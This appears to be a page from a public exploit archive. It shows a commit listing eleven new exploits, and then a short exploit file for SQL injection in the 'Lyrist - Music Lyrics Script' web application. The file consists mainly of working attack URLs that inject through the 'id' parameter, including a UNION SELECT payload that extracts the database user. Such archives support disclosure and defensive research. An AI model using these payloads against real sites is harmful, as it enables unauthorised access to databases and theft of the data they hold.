3df6650dac
11 changes to exploits/shellcodes Werewolf Online 0.8.8 - Information Disclosure Bitmain Antminer D3/L3+/S9 - Remote Command Execution Wordpress Plugin Events Calendar - SQL Injection / Cross-Site Scripting Ingenious School Management System - 'id' SQL Injection Sharetronix CMS 3.6.2 - Cross-Site Request Forgery / Cross-Site Scripting Lyrist - 'id' SQL Injection BookingWizz Booking System 5.5 - 'id' SQL Injection Listing Hub CMS 1.0 - SQL Injection ClipperCMS 1.3.3 - Cross-Site Scripting My Directory 2.0 - SQL Injection / Cross-Site Scripting Baby Names Search Engine 1.0 - 'a' SQL Injection
10 lines
No EOL
415 B
Text
10 lines
No EOL
415 B
Text
# Exploit Title: Lyrist - Music Lyrics Script - SQL Injection
|
|
# Date: 2018-05-26
|
|
# Exploit Author: Meisam Monsef - meisamrce@gmail.com - @meisamrce
|
|
# Vendor Homepage: https://www.codester.com/items/7250/lyrist-music-lyrics-script
|
|
# Version: All Version
|
|
|
|
|
|
Exploit :
|
|
http://site.com/lyrics.php?id=-9999%27+[SQL+Command]+%23
|
|
http://site.com/lyrics.php?id=-9999%27+union+select+1,2,3,user(),5,6,7,8,9,10,11+%23 |